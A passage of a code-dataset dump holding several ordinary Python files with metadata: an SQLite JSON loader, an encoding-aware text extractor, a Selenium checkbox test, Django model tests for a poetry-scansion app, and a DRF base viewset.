sqlite3.connect('11/db.sqlite3')\nc = conn.cursor()\ntry:\n for index,js in enumerate(json_files):\n with open(os.path.join(path_to_json,js)) as json_file:\n json_text = json.load(json_file)\n print(\"loading------------\")\n dgame = json_text[0][\"Game\"]\n c.execute(\"INSERT INTO ttes(game) VALUES (?);\",(dgame,))\n conn.commit()\n print(\"success\") \n\t\nexcept:\n print(\"No new data\")\n", "repo_name": "AlexTsai1618/project_NLP", "sub_path": "Music_NEW/game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 6, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "2410147136", "text": "from chardet import detect\nimport codecs\n\n\nclass TextExtractor:\n @classmethod\n def getContent(cls, file_name):\n\n encoding = \"\"\n\n with open(file_name, \"rb\") as f:\n rawdata = f.read()\n encoding = detect(rawdata)[\"encoding\"]\n\n with codecs.open(\n file_name, \"rb\", encoding=encoding, errors=\"ignore\"\n ) as file_content:\n content = cls.readContent(file_content)\n\n return content\n\n @classmethod\n def readContent(cls, file_content):\n return file_content.read()\n", "repo_name": "BobWatson/concept_miner_elastic", "sub_path": "app/ingestor/TextExtractor.py", "file_name": "TextExtractor.py", "file_ext": "py", "file_size_in_byte": 551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "chardet.detect", "line_number": 13, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "2389224410", "text": "# Coding=utf-8\nfrom selenium import webdriver\nimport os\nimport time\n\ndriver = webdriver.Firefox()\nfile_path = 'file:///' + 
os.path.abspath('checkbox.html')\ndriver.get(file_path)\n\n# Select all elements on the page whose tag name is input\n# inputs = driver.find_elements_by_tag_name('input')\n#\n# # then filter out the ones whose type is checkbox and click to tick them\n# for input in inputs:\n#     if input.get_attribute('type') == 'checkbox':\n#         input.click()\n\n# Select all elements whose type is checkbox and click to tick them\ncheckboxes = driver.find_elements_by_css_selector('input[type=checkbox]')\nfor checkbox in checkboxes:\n    checkbox.click()\n\n# Print how many checkbox-type elements are on the current page\nprint(len(driver.find_elements_by_css_selector('input[type=checkbox]')))\n\n# Untick the last checkbox on the page\ndriver.find_elements_by_css_selector('input[type=checkbox]').pop().click()\ntime.sleep(3)\n\ndriver.quit()\n", "repo_name": "gting/AutoTest", "sub_path": "Test03/Test03.py", "file_name": "Test03.py", "file_ext": "py", "file_size_in_byte": 910, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 6, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "24114691990", "text": "from django.test import TestCase\nfrom scansion.models import User, Word, StressPattern, Poet, Poem, Algorithm, HumanScansion, MachineScansion\n\nclass TestUser(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        User.objects.create(username=\"someone\")\n        User.objects.create(username=\"someoneelse\", score=10)\n\n    def test_user_not_promoted(self):\n        u = User.objects.filter(username=\"someone\")\n        self.assertTrue(u.exists())\n        self.assertEqual(u[0].score, 0)\n        self.assertFalse(u[0].is_promoted())\n        self.assertEqual(u[0].__str__(), \"someone, Promoted: False\")\n\n    def test_user_promoted(self):\n        u = User.objects.filter(username=\"someoneelse\")\n        self.assertTrue(u.exists())\n        self.assertEqual(u[0].score, 10)\n        self.assertTrue(u[0].is_promoted())\n        self.assertEqual(u[0].__str__(), \"someoneelse, Promoted: True\")\n\nclass TestWord(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        Word.objects.create(word=\"squirrel\")\n        Word.objects.create(word=\"rabbit\", popularity=1, syllables=2, part_of_speech=\"n\")\n\n    def test_word_defaults(self):\n        w = Word.objects.filter(word=\"squirrel\")\n        self.assertTrue(w.exists())\n        self.assertEqual(w[0].popularity, 0)\n        self.assertIsNone(w[0].syllables)\n        self.assertEqual(w[0].part_of_speech, \"\")\n        self.assertEqual(w[0].pronunciation_line, \"\")\n        self.assertEqual(w[0].__str__(), \"squirrel\")\n\n    def test_word_values(self):\n        w = Word.objects.filter(word=\"rabbit\")\n        self.assertTrue(w.exists())\n        self.assertEqual(w[0].popularity, 1)\n        self.assertEqual(w[0].syllables, 2)\n        self.assertEqual(w[0].part_of_speech, \"n\")\n        self.assertEqual(w[0].__str__(), \"rabbit\")\n\nclass TestStressPattern(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        Word.objects.create(id=1, word=\"squirrel\", popularity=2)\n        StressPattern.objects.create(word=Word.objects.get(word=\"squirrel\"), stresses=\"squirrel\")\n        StressPattern.objects.create(word=Word.objects.get(word=\"squirrel\"), stresses=\"/u\")\n\n    def test_stresspattern_valid(self):\n        s = StressPattern.objects.filter(word=Word.objects.get(word=\"squirrel\"))\n        self.assertEqual(s.count(), 2)\n        self.assertEqual(s[1].word.word, \"squirrel\")\n        self.assertEqual(s[1].popularity, 1)\n        
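# \"/u\" marks one stressed then one unstressed syllable, so this pattern should span two syllables.\n        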
self.assertEqual(s[1].get_syllable_count(), 2)\n self.assertTrue(s[1].is_valid())\n self.assertEqual(s[1].__str__(), \"squirrel, /u, popularity: 1\")\n \n def test_stresspattern_invalid(self):\n s = StressPattern.objects.filter(word=Word.objects.get(word=\"squirrel\"))\n self.assertFalse(s[0].is_valid())\n self.assertEqual(s[0].__str__(), \"squirrel, squirrel, popularity: 1\")\n\nclass TestPoet(TestCase):\n @classmethod\n def setUpTestData(cls):\n Poet.objects.create(last_name=\"Shakespeare\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=2000, death=1952, bio=\"Lived backward like Merlin!\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=3000, bio=\"Poets of the future!\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", death=3000, bio=\"Not dead yet.\")\n Poet.objects.create(first_name=\"Jane\", last_name=\"Doe\", birth=2000, death=3000, bio=\"Still not dead yet.\")\n \n def test_poet_defaults(self):\n p = Poet.objects.filter(last_name=\"Shakespeare\")\n self.assertEqual(p.count(), 1)\n for trait in [p[0].first_name, p[0].birth, p[0].death, p[0].bio]:\n self.assertTrue(trait is None or trait==\"\")\n self.assertTrue(p[0].is_valid())\n self.assertEqual(p[0].__str__(), \"Shakespeare\")\n \n def test_poets__invalid(self):\n p = Poet.objects.filter(last_name=\"Doe\")\n self.assertEqual(p.count(), 4)\n for poet in p:\n self.assertFalse(poet.is_valid())\n self.assertEqual(poet.__str__(), \"Doe\")\n \nclass TestPoem(TestCase):\n @classmethod\n def setUpTestData(cls):\n Poet.objects.create(last_name=\"Shakespeare\")\n Poem.objects.create(poem=\"moon squirrel\")\n Poem.objects.create(title=\"A Sea Dirge\", poet=Poet.objects.get(last_name=\"Shakespeare\"), poem=\"\"\"Full fathom five thy father lies:\nOf his bones are coral made;\nThose are pearls that were his eyes:\nNothing of him that doth fade,\nBut doth suffer a sea-change\nInto something rich and strange;\nSea-nymphs hourly ring his knell:\nHark! 
now I hear them,--\nDing, dong, Bell.\"\"\", scansion=\"\"\"u /u / u /u /\n/ u / u /u /\n/ u / u / u /\n/u / u / u /\nu u /u u /u\n/u /u / u /\n/u /u / u /\n/ u u / u\n/ u /\"\"\")\n\n    def test_poem_defaults(self):\n        p = Poem.objects.filter(poem=\"moon squirrel\")\n        self.assertEqual(p.count(), 1)\n        self.assertEqual(p[0].title, \"\")\n        self.assertIsNone(p[0].poet)\n        self.assertEqual(p[0].scansion, \"\")\n        self.assertTrue(p[0].has_valid_scansion())\n        self.assertEqual(p[0].first_line(), \"moon squirrel\")\n        self.assertEqual(p[0].__str__(), \"moon squirrel\")\n\n    def test_poem_values(self):\n        p = Poem.objects.filter(title=\"A Sea Dirge\")\n        self.assertEqual(p.count(), 1)\n        self.assertTrue(p[0].has_valid_scansion())\n        self.assertEqual(p[0].poet.last_name, \"Shakespeare\")\n        self.assertEqual(p[0].first_line(), \"Full fathom five thy father lies:\")\n        self.assertEqual(p[0].__str__(), \"A Sea Dirge by Shakespeare\")\n\nclass TestAlgorithm(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        Algorithm.objects.create(name=\"Original Scan\")\n        Algorithm.objects.create(name=\"House Robber Scan\", about=\"An algorithm\", preferred=True)\n\n    def test_algorithm_defaults(self):\n        a = Algorithm.objects.filter(name=\"Original Scan\")\n        self.assertEqual(a[0].about, \"\")\n        self.assertFalse(a[0].preferred)\n        self.assertEqual(a[0].__str__(), \"Original Scan, preferred: False\")\n\n    def test_algorithm_values(self):\n        a = Algorithm.objects.filter(name=\"House Robber Scan\")\n        self.assertEqual(a[0].about, \"An algorithm\")\n        self.assertTrue(a[0].preferred)\n        self.assertEqual(a[0].__str__(), \"House Robber Scan, preferred: True\")\n\nclass TestHumanScansion(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        User.objects.create(username=\"someone\", score=10)\n        User.objects.create(username=\"someoneelse\", score=10)\n        Poem.objects.create(poem=\"moon squirrel\")\n        HumanScansion.objects.create(\n            poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"/ uu\", user=User.objects.get(username=\"someone\")\n        )\n        HumanScansion.objects.create(\n            poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"afds\", user=User.objects.get(username=\"someoneelse\")\n        )\n\n    def test_human_scansion_valid(self):\n        hs = HumanScansion.objects.all()\n        self.assertEqual(hs.count(), 2)\n        self.assertTrue(hs[0].is_valid())\n        self.assertEqual(hs[0].__str__(), \"User1's scansion of moon squirrel\")\n\n    def test_human_scansion_invalid(self):\n        hs = HumanScansion.objects.all()\n        self.assertFalse(hs[1].is_valid())\n\nclass TestMachineScansion(TestCase):\n    @classmethod\n    def setUpTestData(cls):\n        Poem.objects.create(poem=\"moon squirrel\")\n        Algorithm.objects.create(name=\"Buggy Algorithm\")\n        Algorithm.objects.create(name=\"House Robber Algorithm\")\n        MachineScansion.objects.create(\n            poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"saf;jd\", algorithm=Algorithm.objects.get(name=\"Buggy Algorithm\")\n        )\n        MachineScansion.objects.create(\n            poem=Poem.objects.get(poem=\"moon squirrel\"), scansion=\"/ u/\", algorithm=Algorithm.objects.get(name=\"House Robber Algorithm\")\n        )\n\n    def test_machine_scansion_valid(self):\n        ms = MachineScansion.objects.all()\n        self.assertEqual(ms.count(), 2)\n        self.assertTrue(ms[1].is_valid())\n        self.assertEqual(ms[1].__str__(), \"House Robber Algorithm scansion of moon squirrel\")\n\n    def test_machine_scansion_invalid(self):\n        ms = MachineScansion.objects.all()\n        self.assertFalse(ms[0].is_valid())\n", "repo_name": "Hathaway2010/poetry-react", "sub_path": "scansion/tests/test_models.py", "file_name": 
"test_models.py", "file_ext": "py", "file_size_in_byte": 8193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 4, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 7, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 7, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 8, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 8, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 11, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.filter", "line_number": 18, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 18, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 24, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 27, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 27, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 28, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 28, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 31, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 40, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 47, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.create", "line_number": 50, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 50, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.create", "line_number": 51, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 51, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 51, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 51, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 51, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.create", "line_number": 52, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 52, "usage_type": "attribute"}, 
{"api_name": "scansion.models.StressPattern", "line_number": 52, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 52, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 55, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 55, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 55, "usage_type": "name"}, {"api_name": "scansion.models.StressPattern.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "scansion.models.StressPattern.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scansion.models.StressPattern", "line_number": 64, "usage_type": "name"}, {"api_name": "scansion.models.Word.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "scansion.models.Word.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "scansion.models.Word", "line_number": 64, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 68, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 71, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 71, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 71, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 72, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 72, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 73, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 73, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 74, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 74, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 75, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 75, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 75, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 78, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.filter", "line_number": 86, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 86, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 92, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.create", "line_number": 95, 
"usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 95, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 96, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 96, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 97, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 97, "usage_type": "name"}, {"api_name": "scansion.models.Poet.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "scansion.models.Poet.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "scansion.models.Poet", "line_number": 97, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 116, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 126, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 126, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 133, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 136, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 136, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 136, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 137, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 137, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.filter", "line_number": 140, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 140, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 140, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.filter", "line_number": 146, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 146, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 146, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 151, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 154, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 154, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.create", "line_number": 155, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 155, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 155, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 156, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": 
"scansion.models.Poem", "line_number": 156, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.create", "line_number": 157, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 157, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 157, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 158, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 158, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.get", "line_number": 158, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 158, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.create", "line_number": 160, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 160, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 161, "usage_type": "name"}, {"api_name": "scansion.models.User.objects.get", "line_number": 161, "usage_type": "call"}, {"api_name": "scansion.models.User.objects", "line_number": 161, "usage_type": "attribute"}, {"api_name": "scansion.models.User", "line_number": 161, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.all", "line_number": 165, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 165, "usage_type": "name"}, {"api_name": "scansion.models.HumanScansion.objects.all", "line_number": 171, "usage_type": "call"}, {"api_name": "scansion.models.HumanScansion.objects", "line_number": 171, "usage_type": "attribute"}, {"api_name": "scansion.models.HumanScansion", "line_number": 171, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 174, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.create", "line_number": 177, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 177, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 177, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 178, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 178, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 178, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.create", "line_number": 179, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 179, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.create", "line_number": 180, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 180, "usage_type": "name"}, {"api_name": 
"scansion.models.Poem.objects.get", "line_number": 181, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 181, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.get", "line_number": 181, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 181, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 181, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.create", "line_number": 183, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 183, "usage_type": "name"}, {"api_name": "scansion.models.Poem.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "scansion.models.Poem.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "scansion.models.Poem", "line_number": 184, "usage_type": "name"}, {"api_name": "scansion.models.Algorithm.objects.get", "line_number": 184, "usage_type": "call"}, {"api_name": "scansion.models.Algorithm.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "scansion.models.Algorithm", "line_number": 184, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.all", "line_number": 187, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 187, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 187, "usage_type": "name"}, {"api_name": "scansion.models.MachineScansion.objects.all", "line_number": 194, "usage_type": "call"}, {"api_name": "scansion.models.MachineScansion.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "scansion.models.MachineScansion", "line_number": 194, "usage_type": "name"}]} +{"seq_id": "43195962020", "text": "from .response import json_ok_response, json_error_response\n\nfrom rest_framework.viewsets import ModelViewSet\nfrom rest_framework.views import APIView\n\n\nclass BaseModelViewSet(ModelViewSet):\n \"\"\"\n 视图集合基类\n \"\"\"\n\n def create(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).create(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def update(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).update(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def destroy(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).destroy(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n def list(self, request, *args, **kwargs):\n try:\n ordering = request.query_params.get('ordering', '')\n ordering = ordering.replace('+', '').strip()\n if ordering:\n if self.serializer_class is None:\n queryset = self.filter_queryset(self.get_serializer_class().Meta.model.objects.order_by(ordering))\n else:\n queryset = self.filter_queryset(self.serializer_class.Meta.model.objects.order_by(ordering))\n else:\n queryset = self.filter_queryset(self.get_queryset())\n page = request.query_params.get('page', '')\n size = request.query_params.get('size', '')\n if page or size:\n page_queryset = self.paginate_queryset(queryset)\n if page is not None:\n serializer = self.get_serializer(page_queryset, many=True)\n return self.get_paginated_response(serializer.data)\n serializer = self.get_serializer(queryset, 
many=True)\n return json_ok_response(data=serializer.data)\n except Exception as e:\n return json_error_response(message=str(e))\n\n\n def retrieve(self, request, *args, **kwargs):\n response = super(BaseModelViewSet, self).retrieve(request, *args, **kwargs)\n return json_ok_response(response.data)\n\n\nclass BaseApiView(APIView):\n \"\"\"\n APIView视图类\n \"\"\"\n pass\n # authentication_classes = [JSONWebTokenAuthentication]\n # permission_classes = [IsAuthenticated, ]\n\n# class TreeModelViewSet(BaseModelViewSet):\n# serializer_class = TreeSerializer\n#\n# def list(self, request, *args, **kwargs):\n# queryset = self.filter_queryset(self.get_queryset())\n# page = self.paginate_queryset(queryset)\n# s = self.get_serializer(queryset, many=True)\n# response = []\n# try:\n# tree_dict = {item['id']: item for item in s.data}\n# for i in tree_dict:\n# if tree_dict[i]['pid']:\n# pid = tree_dict[i]['pid']\n# parent = tree_dict[pid]\n# parent.setdefault('children', []).append(tree_dict[i])\n# else:\n# response.append(tree_dict[i])\n# except KeyError:\n# response = s.data\n# if page is not None:\n# response = self.get_paginated_response(response)\n# return json_ok_response(response.data)\n# return json_ok_response(response)\n", "repo_name": "yanshicheng/super_ops", "sub_path": "base/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3320, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 7, "usage_type": "name"}, {"api_name": "response.json_ok_response", "line_number": 14, "usage_type": "call"}, {"api_name": "response.data", "line_number": 14, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 18, "usage_type": "call"}, {"api_name": "response.data", "line_number": 18, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 22, "usage_type": "call"}, {"api_name": "response.data", "line_number": 22, "usage_type": "attribute"}, {"api_name": "response.json_ok_response", "line_number": 43, "usage_type": "call"}, {"api_name": "response.json_error_response", "line_number": 45, "usage_type": "call"}, {"api_name": "response.json_ok_response", "line_number": 50, "usage_type": "call"}, {"api_name": "response.data", "line_number": 50, "usage_type": "attribute"}, {"api_name": "rest_framework.views.APIView", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "38920365731", "text": "#!/usr/bin/env python3\n# Write a program that checks the websites of several web comics and auto-\n# matically downloads the images if the comic was updated since the pro-\n# gram’s last visit. Your operating system’s scheduler (Scheduled Tasks on\n# Windows, launchd on macOS, and cron on Linux) can run your Python\n# program once a day. The Python program itself can download the comic\n# and then copy it to your desktop so that it is easy to find. 
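(The script below keeps the date of its last visit in a shelve file and\n# downloads a comic only when its posted date is newer.) 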
